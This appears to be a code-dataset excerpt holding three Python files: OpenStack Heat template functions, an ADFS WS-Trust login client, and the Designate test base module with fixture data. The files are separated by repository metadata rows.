class GetAttAllAttributes(GetAtt):
"""A function for resolving resource attributes.
Takes the form::
get_attr:
- <resource_name>
- <attributes_name>
- <path1>
- ...
where <attributes_name> and <path1>, ... are optional arguments. If there
is no <attributes_name>, result will be dict of all resource's attributes.
Else function returns resolved resource's attribute.
"""
def _parse_args(self):
if not self.args:
raise ValueError(_('Arguments to "%s" can be of the next '
'forms: [resource_name] or '
'[resource_name, attribute, (path), ...]'
) % self.fn_name)
elif isinstance(self.args, collections.Sequence):
if len(self.args) > 1:
return super(GetAttAllAttributes, self)._parse_args()
else:
return self.args[0], None
else:
raise TypeError(_('Argument to "%s" must be a list') %
self.fn_name)
def dep_attrs(self, resource_name):
"""Check if there is no attribute_name defined, return empty chain."""
if self._attribute is not None:
return super(GetAttAllAttributes, self).dep_attrs(resource_name)
elif self._resource().name == resource_name:
res = self._resource()
attrs = six.iterkeys(res.attributes_schema)
else:
attrs = []
return itertools.chain(function.dep_attrs(self.args,
resource_name), attrs)
def result(self):
if self._attribute is None:
r = self._resource()
if (r.status in (r.IN_PROGRESS, r.COMPLETE) and
r.action in (r.CREATE, r.ADOPT, r.SUSPEND, r.RESUME,
r.UPDATE, r.CHECK, r.SNAPSHOT)):
return r.FnGetAtts()
else:
return None
else:
return super(GetAttAllAttributes, self).result()
def _allow_without_attribute_name(self):
return True
class Replace(cfn_funcs.Replace):
"""A function for performing string substitutions.
Takes the form::
str_replace:
template: <key_1> <key_2>
params:
<key_1>: <value_1>
<key_2>: <value_2>
...
And resolves to::
"<value_1> <value_2>"
This is implemented using Python's str.replace on each key. The order in
which replacements are performed is undefined.
"""
def _parse_args(self):
if not isinstance(self.args, collections.Mapping):
raise TypeError(_('Arguments to "%s" must be a map') %
self.fn_name)
try:
mapping = self.args['params']
string = self.args['template']
except (KeyError, TypeError):
example = ('''str_replace:
template: This is var1 template var2
params:
var1: a
var2: string''')
raise KeyError(_('"str_replace" syntax should be %s') %
example)
else:
return mapping, string
class ReplaceJson(Replace):
"""A function for performing string substitutions.
Behaves the same as Replace, but tolerates non-string parameter
values, e.g map/list - these are serialized as json before doing
the string substitution.
"""
def result(self):
template = function.resolve(self._string)
mapping = function.resolve(self._mapping)
if not isinstance(template, six.string_types):
raise TypeError(_('"%s" template must be a string') % self.fn_name)
if not isinstance(mapping, collections.Mapping):
raise TypeError(_('"%s" params must be a map') % self.fn_name)
def replace(string, change):
placeholder, value = change
if not isinstance(placeholder, six.string_types):
raise TypeError(_('"%s" param placeholders must be strings') %
self.fn_name)
if value is None:
value = ''
if not isinstance(value,
(six.string_types, six.integer_types,
float, bool)):
if isinstance(value,
(collections.Mapping, collections.Sequence)):
try:
value = jsonutils.dumps(value, default=None)
except TypeError:
raise TypeError(_('"%(name)s" params must be strings, '
'numbers, list or map. '
'Failed to json serialize %(value)s'
) % {'name': self.fn_name,
'value': value})
else:
raise TypeError(_('"%s" params must be strings, numbers, '
'list or map.') % self.fn_name)
return string.replace(placeholder, six.text_type(value))
return six.moves.reduce(replace, six.iteritems(mapping), template)
class GetFile(function.Function):
"""A function for including a file inline.
Takes the form::
get_file: <file_key>
And resolves to the content stored in the files dictionary under the given
key.
"""
def __init__(self, stack, fn_name, args):
super(GetFile, self).__init__(stack, fn_name, args)
self.files = self.stack.t.files
def result(self):
args = function.resolve(self.args)
if not (isinstance(args, six.string_types)):
raise TypeError(_('Argument to "%s" must be a string') %
self.fn_name)
f = self.files.get(args)
if f is None:
fmt_data = {'fn_name': self.fn_name,
'file_key': args}
raise ValueError(_('No content found in the "files" section for '
'%(fn_name)s path: %(file_key)s') % fmt_data)
return f
class Join(cfn_funcs.Join):
"""A function for joining strings.
Takes the form::
{ "list_join" : [ "<delim>", [ "<string_1>", "<string_2>", ... ] ] }
And resolves to::
"<string_1><delim><string_2><delim>..."
"""
class JoinMultiple(function.Function):
"""A function for joining one or more lists of strings.
Takes the form::
{ "list_join" : [ "<delim>", [ "<string_1>", "<string_2>", ... ] ] }
And resolves to::
"<string_1><delim><string_2><delim>..."
Optionally multiple lists may be specified, which will also be joined.
"""
def __init__(self, stack, fn_name, args):
super(JoinMultiple, self).__init__(stack, fn_name, args)
example = '"%s" : [ " ", [ "str1", "str2"] ...]' % fn_name
fmt_data = {'fn_name': fn_name,
'example': example}
if not isinstance(args, list):
raise TypeError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % fmt_data)
try:
self._delim = args[0]
self._joinlists = args[1:]
if len(self._joinlists) < 1:
raise ValueError
except (IndexError, ValueError):
raise ValueError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % fmt_data)
def result(self):
r_joinlists = function.resolve(self._joinlists)
strings = []
for jl in r_joinlists:
if jl:
if (isinstance(jl, six.string_types) or
not isinstance(jl, collections.Sequence)):
raise TypeError(_('"%s" must operate on '
'a list') % self.fn_name)
strings += jl
delim = function.resolve(self._delim)
if not isinstance(delim, six.string_types):
raise TypeError(_('"%s" delimiter must be a string') %
self.fn_name)
def ensure_string(s):
msg = _('Items to join must be string, map or list not %s'
) % (repr(s)[:200])
if s is None:
return ''
elif isinstance(s, six.string_types):
return s
elif isinstance(s, (collections.Mapping, collections.Sequence)):
try:
return jsonutils.dumps(s, default=None)
except TypeError:
msg = _('Items to join must be string, map or list. '
'%s failed json serialization'
) % (repr(s)[:200])
raise TypeError(msg)
return delim.join(ensure_string(s) for s in strings)
class MapMerge(function.Function):
"""A function for merging maps.
Takes the form::
{ "map_merge" : [{'k1': 'v1', 'k2': 'v2'}, {'k1': 'v2'}] }
And resolves to::
{'k1': 'v2', 'k2': 'v2'}
"""
def __init__(self, stack, fn_name, args):
super(MapMerge, self).__init__(stack, fn_name, args)
example = (_('"%s" : [ { "key1": "val1" }, { "key2": "val2" } ]')
% fn_name)
self.fmt_data = {'fn_name': fn_name, 'example': example}
def result(self):
args = function.resolve(self.args)
if not isinstance(args, collections.Sequence):
raise TypeError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
def ensure_map(m):
if m is None:
return {}
elif isinstance(m, collections.Mapping):
return m
else:
msg = _('Incorrect arguments: Items to merge must be maps.')
raise TypeError(msg)
ret_map = {}
for m in args:
ret_map.update(ensure_map(m))
return ret_map
class ResourceFacade(cfn_funcs.ResourceFacade):
"""A function for retrieving data in a parent provider template.
A function for obtaining data from the facade resource from within the
corresponding provider template.
Takes the form::
resource_facade: <attribute_type>
where the valid attribute types are "metadata", "deletion_policy" and
"update_policy".
"""
_RESOURCE_ATTRIBUTES = (
METADATA, DELETION_POLICY, UPDATE_POLICY,
) = (
'metadata', 'deletion_policy', 'update_policy'
)
class Removed(function.Function):
"""This function existed in previous versions of HOT, but has been removed.
Check the HOT guide for an equivalent native function.
"""
def validate(self):
exp = (_("The function %s is not supported in this version of HOT.") %
self.fn_name)
raise exception.InvalidTemplateVersion(explanation=exp)
def result(self):
return super(Removed, self).result()
class Repeat(function.Function):
"""A function for iterating over a list of items.
Takes the form::
repeat:
template:
<body>
for_each:
<var>: <list>
The result is a new list of the same size as <list>, where each element
is a copy of <body> with any occurrences of <var> replaced with the
corresponding item of <list>.
"""
def __init__(self, stack, fn_name, args):
super(Repeat, self).__init__(stack, fn_name, args)
if not isinstance(self.args, collections.Mapping):
raise TypeError(_('Arguments to "%s" must be a map') %
self.fn_name)
# We don't check for invalid keys appearing here, which is wrong but
# it's probably too late to change
try:
self._for_each = self.args['for_each']
self._template = self.args['template']
except KeyError:
example = ('''repeat:
template: This is %var%
for_each:
%var%: ['a', 'b', 'c']''')
raise KeyError(_('"repeat" syntax should be %s') % example)
def validate(self):
super(Repeat, self).validate()
if not isinstance(self._for_each, function.Function):
if not isinstance(self._for_each, collections.Mapping):
raise TypeError(_('The "for_each" argument to "%s" must '
'contain a map') % self.fn_name)
if not all(self._valid_list(v) for v in self._for_each.values()):
raise TypeError(_('The values of the "for_each" argument '
'to "%s" must be lists') % self.fn_name)
@staticmethod
def _valid_list(arg):
return (isinstance(arg, (collections.Sequence,
function.Function)) and
not isinstance(arg, six.string_types))
def _do_replacement(self, keys, values, template):
if isinstance(template, six.string_types):
for (key, value) in zip(keys, values):
template = template.replace(key, value)
return template
elif isinstance(template, collections.Sequence):
return [self._do_replacement(keys, values, elem)
for elem in template]
elif isinstance(template, collections.Mapping):
return dict((self._do_replacement(keys, values, k),
self._do_replacement(keys, values, v))
for (k, v) in template.items())
def result(self):
for_each = function.resolve(self._for_each)
if not all(self._valid_list(l) for l in for_each.values()):
raise TypeError(_('The values of the "for_each" argument to '
'"%s" must be lists') % self.fn_name)
template = function.resolve(self._template)
keys, lists = six.moves.zip(*for_each.items())
return [self._do_replacement(keys, replacements, template)
for replacements in itertools.product(*lists)]
class Digest(function.Function):
"""A function for performing digest operations.
Takes the form::
digest:
- <algorithm>
- <value>
Valid algorithms are the ones provided by natively by hashlib (md5, sha1,
sha224, sha256, sha384, and sha512) or any one provided by OpenSSL.
"""
def validate_usage(self, args):
if not (isinstance(args, list) and
all([isinstance(a, six.string_types) for a in args])):
msg = _('Argument to function "%s" must be a list of strings')
raise TypeError(msg % self.fn_name)
if len(args) != 2:
msg = _('Function "%s" usage: ["<algorithm>", "<value>"]')
raise ValueError(msg % self.fn_name)
if six.PY3:
algorithms = hashlib.algorithms_available
else:
algorithms = hashlib.algorithms
if args[0].lower() not in algorithms:
msg = _('Algorithm must be one of %s')
raise ValueError(msg % six.text_type(algorithms))
def digest(self, algorithm, value):
_hash = hashlib.new(algorithm)
_hash.update(six.b(value))
return _hash.hexdigest()
def result(self):
args = function.resolve(self.args)
self.validate_usage(args)
return self.digest(*args)
class StrSplit(function.Function):
"""A function for splitting delimited strings into a list.
Optionally extracting a specific list member by index.
Takes the form::
str_split: [delimiter, string, <index> ]
or::
str_split:
- delimiter
- string
- <index>
If <index> is specified, the specified list item will be returned
otherwise, the whole list is returned, similar to get_attr with
path based attributes accessing lists.
"""
def __init__(self, stack, fn_name, args):
super(StrSplit, self).__init__(stack, fn_name, args)
example = '"%s" : [ ",", "apples,pears", <index>]' % fn_name
self.fmt_data = {'fn_name': fn_name,
'example': example}
self.fn_name = fn_name
if isinstance(args, (six.string_types, collections.Mapping)):
raise TypeError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
def result(self):
args = function.resolve(self.args)
try:
delim = args.pop(0)
str_to_split = args.pop(0)
except (AttributeError, IndexError):
raise ValueError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
split_list = str_to_split.split(delim)
# Optionally allow an index to be specified
if args:
try:
index = int(args.pop(0))
except ValueError:
raise ValueError(_('Incorrect index to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
else:
try:
res = split_list[index]
except IndexError:
raise ValueError(_('Incorrect index to "%(fn_name)s" '
'should be between 0 and '
'%(max_index)s')
% {'fn_name': self.fn_name,
'max_index': len(split_list) - 1})
else:
res = split_list
return res
class Yaql(function.Function):
"""A function for executing a yaql expression.
Takes the form::
yaql:
expression:
<body>
data:
<var>: <list>
Evaluates expression <body> on the given data.
"""
_parser = None
@classmethod
def get_yaql_parser(cls):
if cls._parser is None:
global_options = {
'yaql.limitIterators': cfg.CONF.yaql.limit_iterators,
'yaql.memoryQuota': cfg.CONF.yaql.memory_quota
}
cls._parser = yaql.YaqlFactory().create(global_options)
return cls._parser
def __init__(self, stack, fn_name, args):
super(Yaql, self).__init__(stack, fn_name, args)
self.parser = self.get_yaql_parser()
self.context = yaql.create_context()
if not isinstance(self.args, collections.Mapping):
raise TypeError(_('Arguments to "%s" must be a map.') %
self.fn_name)
try:
self._expression = self.args['expression']
self._data = self.args.get('data', {})
for arg in six.iterkeys(self.args):
if arg not in ['expression', 'data']:
raise KeyError
except (KeyError, TypeError):
example = ('''%s:
expression: $.data.var1.sum()
data:
var1: [3, 2, 1]''') % self.fn_name
raise KeyError(_('"%(name)s" syntax should be %(example)s') % {
'name': self.fn_name, 'example': example})
def validate_expression(self, expression):
try:
self.parser(expression)
except exceptions.YaqlException as yex:
raise ValueError(_('Bad expression %s.') % yex)
def validate(self):
super(Yaql, self).validate()
if not isinstance(self._data,
(collections.Mapping, function.Function)):
raise TypeError(_('The "data" argument to "%s" must contain '
'a map.') % self.fn_name)
if not isinstance(self._expression,
(six.string_types, function.Function)):
raise TypeError(_('The "expression" argument to %s must '
'contain a string or a '
'function.') % self.fn_name)
if isinstance(self._expression, six.string_types):
self.validate_expression(self._expression)
def result(self):
data = function.resolve(self._data)
if not isinstance(data, collections.Mapping):
raise TypeError(_('The "data" argument to "%s" must contain '
'a map.') % self.fn_name)
ctxt = {'data': data}
self.context['$'] = ctxt
if not isinstance(self._expression, six.string_types):
self._expression = function.resolve(self._expression)
self.validate_expression(self._expression)
return self.parser(self._expression).evaluate(context=self.context)
| apache-2.0 | 9,040,869,011,473,077,000 | 32.959799 | 79 | 0.531296 | false |
zaccone/pyadfsclient | adfs.py | 1 | 9572 | import datetime
import string
import urllib2
import uuid
import requests
from lxml import etree
class ADFSClient(object):
HEADER_SOAP = {"Content-Type": "application/soap+xml; charset=utf-8"}
HEADER_X_FORM = {"Content-Type": "application/x-www-form-urlencoded"}
ASSERTION_NAMESPACES = {
's': 'http://www.w3.org/2003/05/soap-envelope',
't': 'http://docs.oasis-open.org/ws-sx/ws-trust/200512'
}
ADFS_ASSERTION_XPATH = ('/s:Envelope/s:Body'
'/t:RequestSecurityTokenResponseCollection'
'/t:RequestSecurityTokenResponse')
def __init__(self,
username, password,
adfs_url,
sp_endpoint,
sp_url,
valid=3600,
verify=True):
self.username = username
self.password = password
self.adfs_url = adfs_url
self.sp_endpoint = sp_endpoint
self.sp_url = sp_url
self.valid = valid
self.verify = verify
self.session = requests.Session()
def _token_dates(self, fmt='%Y-%m-%dT%H:%M:%S.%fZ'):
date_created = datetime.datetime.utcnow()
date_expires = date_created + datetime.timedelta(
seconds=self.valid)
return [_time.strftime(fmt) for _time in (date_created, date_expires)]
@property
def _uuid4(self):
return str(uuid.uuid4())
@staticmethod
def _first(l):
return l[0]
def _prepare_adfs_request(self):
"""Build the ADFS Request Security Token SOAP message.
Some values like username or password are inserted in the request.
"""
NAMESPACES = {
's': 'http://www.w3.org/2003/05/soap-envelope',
'a': 'http://www.w3.org/2005/08/addressing',
'u': ('http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd')
}
WSS_SECURITY_NAMESPACE = {
'o': ('http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-secext-1.0.xsd')
}
TRUST_NAMESPACE = {
'trust': 'http://docs.oasis-open.org/ws-sx/ws-trust/200512'
}
WSP_NAMESPACE = {
'wsp': 'http://schemas.xmlsoap.org/ws/2004/09/policy'
}
WSA_NAMESPACE = {
'wsa': 'http://www.w3.org/2005/08/addressing'
}
root = etree.Element(
'{http://www.w3.org/2003/05/soap-envelope}Envelope',
nsmap=NAMESPACES)
header = etree.SubElement(
root, '{http://www.w3.org/2003/05/soap-envelope}Header')
action = etree.SubElement(
header, "{http://www.w3.org/2005/08/addressing}Action")
action.set(
"{http://www.w3.org/2003/05/soap-envelope}mustUnderstand", "1")
action.text = ('http://docs.oasis-open.org/ws-sx/ws-trust/200512'
'/RST/Issue')
messageID = etree.SubElement(
header, '{http://www.w3.org/2005/08/addressing}MessageID')
messageID.text = 'urn:uuid:' + self._uuid4
replyID = etree.SubElement(
header, '{http://www.w3.org/2005/08/addressing}ReplyTo')
address = etree.SubElement(
replyID, '{http://www.w3.org/2005/08/addressing}Address')
address.text = 'http://www.w3.org/2005/08/addressing/anonymous'
to = etree.SubElement(
header, '{http://www.w3.org/2005/08/addressing}To')
to.set("{http://www.w3.org/2003/05/soap-envelope}mustUnderstand", "1")
to.text = self.adfs_url
security = etree.SubElement(
header, '{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-secext-1.0.xsd}Security',
nsmap=WSS_SECURITY_NAMESPACE)
security.set(
"{http://www.w3.org/2003/05/soap-envelope}mustUnderstand", "1")
timestamp = etree.SubElement(
security, ('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Timestamp'))
timestamp.set(
('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Id'), '_0')
created = etree.SubElement(
timestamp, ('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Created'))
expires = etree.SubElement(
timestamp, ('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Expires'))
created.text, expires.text = self._token_dates()
usernametoken = etree.SubElement(
security, '{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-secext-1.0.xsd}UsernameToken')
usernametoken.set(
('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-'
'wssecurity-utility-1.0.xsd}u'), "uuid-%s-1" % self._uuid4)
username = etree.SubElement(
usernametoken, ('{http://docs.oasis-open.org/wss/2004/01/oasis-'
'200401-wss-wssecurity-secext-1.0.xsd}Username'))
username.text = self.username
password = etree.SubElement(
usernametoken, ('{http://docs.oasis-open.org/wss/2004/01/oasis-'
'200401-wss-wssecurity-secext-1.0.xsd}Password'),
Type=('http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-'
'username-token-profile-1.0#PasswordText'))
password.text = self.password
body = etree.SubElement(
root, "{http://www.w3.org/2003/05/soap-envelope}Body")
request_security_token = etree.SubElement(
body, ('{http://docs.oasis-open.org/ws-sx/ws-trust/200512}'
'RequestSecurityToken'), nsmap=TRUST_NAMESPACE)
applies_to = etree.SubElement(
request_security_token,
'{http://schemas.xmlsoap.org/ws/2004/09/policy}AppliesTo',
nsmap=WSP_NAMESPACE)
endpoint_reference = etree.SubElement(
applies_to,
'{http://www.w3.org/2005/08/addressing}EndpointReference',
nsmap=WSA_NAMESPACE)
wsa_address = etree.SubElement(
endpoint_reference,
'{http://www.w3.org/2005/08/addressing}Address')
wsa_address.text = self.sp_endpoint
keytype = etree.SubElement(
request_security_token,
'{http://docs.oasis-open.org/ws-sx/ws-trust/200512}KeyType')
keytype.text = ('http://docs.oasis-open.org/ws-sx/'
'ws-trust/200512/Bearer')
request_type = etree.SubElement(
request_security_token,
'{http://docs.oasis-open.org/ws-sx/ws-trust/200512}RequestType')
request_type.text = ('http://docs.oasis-open.org/ws-sx/'
'ws-trust/200512/Issue')
token_type = etree.SubElement(
request_security_token,
'{http://docs.oasis-open.org/ws-sx/ws-trust/200512}TokenType')
token_type.text = 'urn:oasis:names:tc:SAML:1.0:assertion'
self.prepared_request = root
@property
def prepared_request_str(self):
try:
self._prepared_request_str
except AttributeError:
self._prepare_adfs_request()
# noinspection PyAttributeOutsideInit
self._prepared_request_str = etree.tostring(self.prepared_request)
finally:
return self._prepared_request_str
def _get_adfs_security_token(self):
adfs_response = self.session.post(
url=self.adfs_url, headers=self.HEADER_SOAP,
data=self.prepared_request_str, verify=self.verify)
# TODO(marek): check response
self.adfs_token = adfs_response.content
def _prepare_sp_request(self):
tree = etree.XML(self.adfs_token)
assertion = tree.xpath(self.ADFS_ASSERTION_XPATH,
namespaces=self.ASSERTION_NAMESPACES)
assertion = self._first(assertion)
assertion = etree.tostring(assertion)
# FIXME(marek): Dirty hack. I should not replace serialized XML object
# Unfortunately lxml doesn't allow for namespaces changing in-place
# and probably the only solution for now is to build the assertion
# from scratch and reuse values from the adfs security token.
assertion = string.replace(
assertion, 'http://docs.oasis-open.org/ws-sx/ws-trust/200512',
'http://schemas.xmlsoap.org/ws/2005/02/trust')
encoded_assertion = urllib2.quote(assertion.encode('utf8'))
self.encoded_assertion = 'wa=wsignin1.0&wresult=' + encoded_assertion
def _login_with_sp(self):
self.session.post(
url=self.sp_endpoint, data=self.encoded_assertion,
headers=self.HEADER_X_FORM, allow_redirects=False,
verify=self.verify)
# TODO(marek): check response code
def login(self):
self._prepare_adfs_request()
self._get_adfs_security_token()
self._prepare_sp_request()
self._login_with_sp()
def get_session(self):
return self.session
def get_cookie(self):
return self.session.cookies
def access_resource(self, **kwargs):
r = self.session.get(url=self.sp_url, verify=self.verify,
**kwargs)
if r.ok:
return r.content
| mit | -3,973,313,951,088,651,000 | 36.833992 | 79 | 0.579921 | false |
richm/designate | designate/tests/__init__.py | 1 | 16698 | # Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import fixtures
import functools
import os
import inspect
from migrate.versioning import repository
import shutil
import sqlalchemy
import tempfile
from migrate.versioning import api as versioning_api
from testtools import testcase
from oslo.config import cfg
from oslo.messaging import conffixture as messaging_fixture
from oslo.messaging.notify import _impl_test as test_notifier
from designate.openstack.common import log as logging
from designate.openstack.common.fixture import config
from designate.openstack.common import importutils
from designate.openstack.common import test
from designate import policy
from designate import utils
from designate.context import DesignateContext
from designate.tests import resources
from designate import exceptions
from designate.network_api import fake as fake_network_api
from designate import network_api
# NOTE: If eventlet isn't patched and there's a exc tests block
import eventlet
eventlet.monkey_patch(os=False)
LOG = logging.getLogger(__name__)
cfg.CONF.import_opt('storage_driver', 'designate.central',
group='service:central')
cfg.CONF.import_opt('backend_driver', 'designate.agent',
group='service:agent')
cfg.CONF.import_opt('auth_strategy', 'designate.api',
group='service:api')
cfg.CONF.import_opt('database_connection', 'designate.storage.impl_sqlalchemy',
group='storage:sqlalchemy')
class NotifierFixture(fixtures.Fixture):
def setUp(self):
super(NotifierFixture, self).setUp()
self.addCleanup(test_notifier.reset)
def get(self):
return test_notifier.NOTIFICATIONS
def clear(self):
return test_notifier.reset()
class ServiceFixture(fixtures.Fixture):
def __init__(self, svc_name, *args, **kw):
cls = importutils.import_class(
'designate.%s.service.Service' % svc_name)
self.svc = cls.create(binary='desgignate-' + svc_name, *args, **kw)
def setUp(self):
super(ServiceFixture, self).setUp()
self.svc.start()
self.addCleanup(self.kill)
def kill(self):
try:
self.svc.kill()
except Exception:
pass
class PolicyFixture(fixtures.Fixture):
def setUp(self):
super(PolicyFixture, self).setUp()
self.addCleanup(policy.reset)
class DatabaseFixture(fixtures.Fixture):
fixtures = {}
@staticmethod
def get_fixture(repo_path):
if repo_path not in DatabaseFixture.fixtures:
DatabaseFixture.fixtures[repo_path] = DatabaseFixture(repo_path)
return DatabaseFixture.fixtures[repo_path]
def _mktemp(self):
_, path = tempfile.mkstemp(prefix='designate-', suffix='.sqlite',
dir='/tmp')
return path
def __init__(self, repo_path):
super(DatabaseFixture, self).__init__()
self.golden_db = self._mktemp()
engine = sqlalchemy.create_engine('sqlite:///%s' % self.golden_db)
repo = repository.Repository(repo_path)
versioning_api.version_control(engine, repository=repo)
versioning_api.upgrade(engine, repository=repo)
self.working_copy = self._mktemp()
self.url = 'sqlite:///%s' % self.working_copy
def setUp(self):
super(DatabaseFixture, self).setUp()
shutil.copyfile(self.golden_db, self.working_copy)
class NetworkAPIFixture(fixtures.Fixture):
def setUp(self):
super(NetworkAPIFixture, self).setUp()
self.api = network_api.get_network_api(cfg.CONF.network_api)
self.fake = fake_network_api
self.addCleanup(self.fake.reset_floatingips)
class TestCase(test.BaseTestCase):
quota_fixtures = [{
'resource': 'domains',
'hard_limit': 5,
}, {
'resource': 'records',
'hard_limit': 50,
}]
server_fixtures = [{
'name': 'ns1.example.org.',
}, {
'name': 'ns2.example.org.',
}, {
'name': 'ns2.example.org.',
}]
# The last tld is invalid
tld_fixtures = [{
'name': 'com',
}, {
'name': 'co.uk',
}, {
'name': 'com.',
}]
default_tld_fixtures = [{
'name': 'com',
}, {
'name': 'org',
}, {
'name': 'net',
}]
tsigkey_fixtures = [{
'name': 'test-key-one',
'algorithm': 'hmac-md5',
'secret': 'SomeSecretKey',
}, {
'name': 'test-key-two',
'algorithm': 'hmac-sha256',
'secret': 'AnotherSecretKey',
}]
# The last domain is invalid
domain_fixtures = [{
'name': 'example.com.',
'email': '[email protected]',
}, {
'name': 'example.net.',
'email': '[email protected]',
}, {
'name': 'example.org.',
'email': '[email protected]',
}, {
'name': 'invalid.com.....',
'email': '[email protected]',
}]
recordset_fixtures = {
'A': [
{'name': 'mail.%s', 'type': 'A'},
{'name': 'www.%s', 'type': 'A'},
],
'MX': [
{'name': 'mail.%s', 'type': 'MX'},
],
'SRV': [
{'name': '_sip._tcp.%s', 'type': 'SRV'},
{'name': '_sip._udp.%s', 'type': 'SRV'},
],
}
record_fixtures = {
'A': [
{'data': '192.0.2.1'},
{'data': '192.0.2.2'}
],
'MX': [
{'data': 'mail.example.org.', 'priority': 5},
{'data': 'mail.example.com.', 'priority': 10},
],
'SRV': [
{'data': '0 5060 server1.example.org.', 'priority': 5},
{'data': '1 5060 server2.example.org.', 'priority': 10},
]
}
ptr_fixtures = [
{'ptrdname': 'srv1.example.com.'},
{'ptrdname': 'srv1.example.net.'}
]
blacklist_fixtures = [{
'pattern': 'blacklisted.com.',
'description': 'This is a comment',
}, {
'pattern': 'blacklisted.net.'
}, {
'pattern': 'blacklisted.org.'
}]
def setUp(self):
super(TestCase, self).setUp()
self.useFixture(fixtures.FakeLogger('designate', level='DEBUG'))
self.CONF = self.useFixture(config.Config(cfg.CONF)).conf
self.messaging_conf = self.useFixture(
messaging_fixture.ConfFixture(cfg.CONF))
self.messaging_conf.transport_driver = 'fake'
self.config(notification_driver='test')
self.notifications = self.useFixture(NotifierFixture())
self.config(
storage_driver='sqlalchemy',
backend_driver='fake',
group='service:central'
)
self.config(
backend_driver='fake',
group='service:agent'
)
self.config(
auth_strategy='noauth',
group='service:api'
)
# The database fixture needs to be set up here (as opposed to isolated
# in a storage test case) because many tests end up using storage.
REPOSITORY = os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', 'storage',
'impl_sqlalchemy',
'migrate_repo'))
self.db_fixture = self.useFixture(
DatabaseFixture.get_fixture(REPOSITORY))
self.config(
database_connection=self.db_fixture.url,
group='storage:sqlalchemy'
)
self.config(network_api='fake')
self.config(
managed_resource_tenant_id='managing_tenant',
group='service:central')
self.CONF([], project='designate')
self.useFixture(PolicyFixture())
self.network_api = NetworkAPIFixture()
self.useFixture(self.network_api)
self.admin_context = self.get_admin_context()
# Config Methods
def config(self, **kwargs):
group = kwargs.pop('group', None)
for k, v in kwargs.iteritems():
cfg.CONF.set_override(k, v, group)
def policy(self, rules, default_rule='allow', overwrite=True):
# Inject an allow and deny rule
rules['allow'] = '@'
rules['deny'] = '!'
# Set the rules
policy.set_rules(rules, default_rule, overwrite)
# Other Utility Methods
def get_notifications(self):
return self.notifications.get()
def reset_notifications(self):
self.notifications.clear()
def start_service(self, svc_name, *args, **kw):
"""
Convenience method for starting a service!
"""
fixture = ServiceFixture(svc_name, *args, **kw)
self.useFixture(fixture)
return fixture.svc
# Context Methods
def get_context(self, **kwargs):
return DesignateContext(**kwargs)
def get_admin_context(self):
return DesignateContext.get_admin_context(
tenant=utils.generate_uuid(),
user=utils.generate_uuid())
# Fixture methods
def get_quota_fixture(self, fixture=0, values={}):
_values = copy.copy(self.quota_fixtures[fixture])
_values.update(values)
return _values
def get_server_fixture(self, fixture=0, values={}):
_values = copy.copy(self.server_fixtures[fixture])
_values.update(values)
return _values
def get_tld_fixture(self, fixture=0, values={}):
_values = copy.copy(self.tld_fixtures[fixture])
_values.update(values)
return _values
def get_default_tld_fixture(self, fixture=0, values={}):
_values = copy.copy(self.default_tld_fixtures[fixture])
_values.update(values)
return _values
def get_tsigkey_fixture(self, fixture=0, values={}):
_values = copy.copy(self.tsigkey_fixtures[fixture])
_values.update(values)
return _values
def get_domain_fixture(self, fixture=0, values={}):
_values = copy.copy(self.domain_fixtures[fixture])
_values.update(values)
return _values
def get_recordset_fixture(self, domain_name, type='A', fixture=0,
values={}):
_values = copy.copy(self.recordset_fixtures[type][fixture])
_values.update(values)
try:
_values['name'] = _values['name'] % domain_name
except TypeError:
pass
return _values
def get_record_fixture(self, recordset_type, fixture=0, values={}):
_values = copy.copy(self.record_fixtures[recordset_type][fixture])
_values.update(values)
return _values
def get_ptr_fixture(self, fixture=0, values={}):
_values = copy.copy(self.ptr_fixtures[fixture])
_values.update(values)
return _values
def get_zonefile_fixture(self, variant=None):
if variant is None:
f = 'example.com.zone'
else:
f = '%s_example.com.zone' % variant
path = os.path.join(resources.path, 'zonefiles', f)
with open(path) as zonefile:
return zonefile.read()
def get_blacklist_fixture(self, fixture=0, values={}):
_values = copy.copy(self.blacklist_fixtures[fixture])
_values.update(values)
return _values
def create_quota(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_quota_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_quota(context, values=values)
def create_server(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_server_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_server(context, values=values)
def create_tld(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_tld_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_tld(context, values=values)
def create_default_tld(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_default_tld_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_tld(context, values=values)
